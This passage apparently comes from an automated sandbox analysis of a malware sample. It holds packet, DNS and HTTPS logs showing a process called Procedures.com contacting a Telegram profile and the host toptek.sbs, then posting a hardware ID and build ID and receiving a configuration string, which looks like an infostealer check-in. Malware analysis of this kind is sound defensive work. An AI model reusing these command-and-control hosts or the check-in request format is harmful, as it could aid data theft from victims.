                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.165237904 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.165786028 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.178194046 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.492592096 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.498105049 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.498213053 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.498224974 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.498478889 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.508227110 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.825537920 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.830722094 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.830852032 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.830905914 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.831336021 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:12.839538097 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.154998064 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.160015106 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.160094976 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.160128117 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.160309076 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.170413971 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.523705959 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.523741007 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.523775101 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.523808002 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.524365902 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.533576965 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.847987890 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.855151892 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.855197906 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.855328083 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.855860949 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:13.861643076 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.185069084 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.191606998 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.191622019 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.191639900 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.191931963 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.199136019 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.514775038 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.520912886 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.521066904 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.521095037 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.521322966 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.528655052 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.843055010 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.848011971 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.848057985 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.848092079 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.848304987 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:14.853800058 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.168148041 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.173438072 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.173476934 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.173527002 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.173701048 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.201047897 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.512451887 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.516994953 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.521496058 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.521528006 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.521622896 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.521828890 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.526983976 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.841101885 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.846295118 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.846328974 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.846365929 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.846677065 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:15.852252960 CET53444443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:16.167381048 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:16.173558950 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:16.173614025 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:16.173732042 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:16.647329092 CET4435344423.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:25:17.343029976 CET4435344423.209.72.32192.168.2.5

                                                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:13.133224010 CET192.168.2.51.1.1.10xeed1Standard query (0)ZWVyoKcTcBhhzV.ZWVyoKcTcBhhzVA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:38.226248026 CET192.168.2.51.1.1.10xceabStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.335803986 CET192.168.2.51.1.1.10xb93dStandard query (0)toptek.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.778043985 CET192.168.2.51.1.1.10x4c64Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.778204918 CET192.168.2.51.1.1.10x228eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.016138077 CET192.168.2.51.1.1.10xf7aeStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.016525030 CET192.168.2.51.1.1.10xc71aStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:25.719722986 CET192.168.2.51.1.1.10xaeb6Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:25.720711946 CET192.168.2.51.1.1.10x2513Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.189282894 CET192.168.2.51.1.1.10x4ba9Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.189515114 CET192.168.2.51.1.1.10xb2dStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.190294981 CET192.168.2.51.1.1.10xa6acStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.190691948 CET192.168.2.51.1.1.10x21edStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.190999985 CET192.168.2.51.1.1.10xc305Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.191361904 CET192.168.2.51.1.1.10x73bdStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.219543934 CET192.168.2.51.1.1.10xb47fStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.219927073 CET192.168.2.51.1.1.10x172fStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.099169970 CET192.168.2.51.1.1.10x7181Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.099387884 CET192.168.2.51.1.1.10xda25Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.102222919 CET192.168.2.51.1.1.10xf414Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.102442980 CET192.168.2.51.1.1.10x8c90Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.238471031 CET192.168.2.51.1.1.10xba98Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.238612890 CET192.168.2.51.1.1.10x6633Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.383244038 CET192.168.2.51.1.1.10xa2adStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.383373022 CET192.168.2.51.1.1.10xbfe0Standard query (0)api.msn.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:13.356106043 CET1.1.1.1192.168.2.50xeed1Name error (3)ZWVyoKcTcBhhzV.ZWVyoKcTcBhhzVnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:38.365381002 CET1.1.1.1192.168.2.50xceabNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:40.481794119 CET1.1.1.1192.168.2.50xb93dNo error (0)toptek.sbs94.130.188.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.918572903 CET1.1.1.1192.168.2.50x4c64No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:23:55.918586016 CET1.1.1.1192.168.2.50x228eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.153620005 CET1.1.1.1192.168.2.50xf7aeNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.154135942 CET1.1.1.1192.168.2.50xc71aNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.438946009 CET1.1.1.1192.168.2.50xc53dNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.445375919 CET1.1.1.1192.168.2.50x76b4No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:23.445375919 CET1.1.1.1192.168.2.50x76b4No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:25.858575106 CET1.1.1.1192.168.2.50x2513No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:25.955471992 CET1.1.1.1192.168.2.50xaeb6No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.326818943 CET1.1.1.1192.168.2.50xb2dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.326834917 CET1.1.1.1192.168.2.50x4ba9No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.326834917 CET1.1.1.1192.168.2.50x4ba9No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327197075 CET1.1.1.1192.168.2.50xa6acNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327197075 CET1.1.1.1192.168.2.50xa6acNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327771902 CET1.1.1.1192.168.2.50xc305No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.327771902 CET1.1.1.1192.168.2.50xc305No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328094006 CET1.1.1.1192.168.2.50x21edNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.328370094 CET1.1.1.1192.168.2.50x73bdNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.356688976 CET1.1.1.1192.168.2.50xb47fNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.356688976 CET1.1.1.1192.168.2.50xb47fNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:27.356805086 CET1.1.1.1192.168.2.50x172fNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.239233017 CET1.1.1.1192.168.2.50x8c90No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.239362955 CET1.1.1.1192.168.2.50xf414No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.240570068 CET1.1.1.1192.168.2.50x7181No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.240570068 CET1.1.1.1192.168.2.50x7181No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.240570068 CET1.1.1.1192.168.2.50x7181No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.240570068 CET1.1.1.1192.168.2.50x7181No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.375528097 CET1.1.1.1192.168.2.50x6633No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.377123117 CET1.1.1.1192.168.2.50xba98No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.520545959 CET1.1.1.1192.168.2.50xa2adNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:28.520572901 CET1.1.1.1192.168.2.50xbfe0No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                  • t.me
                                                                                                                                                                                                                                                                                                  • toptek.sbs
                                                                                                                                                                                                                                                                                                  • www.google.com
                                                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                                                                                    • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                    • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                    • c.msn.com

                                                                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  0192.168.2.549739149.154.167.994431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:39 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: t.me
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:40 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:40 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                  Content-Length: 12295
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Set-Cookie: stel_ssid=c042b3ea66b019bf4b_4085821867753902132; expires=Tue, 24 Dec 2024 05:23:40 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                  Cache-control: no-store
                                                                                                                                                                                                                                                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:40 UTC12295INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  1192.168.2.54974594.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:42 UTC230OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:42 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  2192.168.2.54975494.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:44 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WT
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 255
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:44 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 36 34 41 36 43 38 34 34 30 35 42 33 34 30 37 37 39 30 35 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 37 51 51 49 4d 4f 5a 4d 59 55 53 52 51 49 35 38 47 34 57 54 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: ------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="hwid"064A6C84405B340779059-a33c7340-61ca------7QQIMOZMYUSRQI58G4WTContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------7QQIMOZMYUSRQI58G4WT--
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:23:45 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:23:45 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 7c 31 7c 31 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 3a1|1|1|1|0e82b28cfc26d5aa50292f6553065302|1|1|1|1|0|50000|10


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  3192.168.2.54976294.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
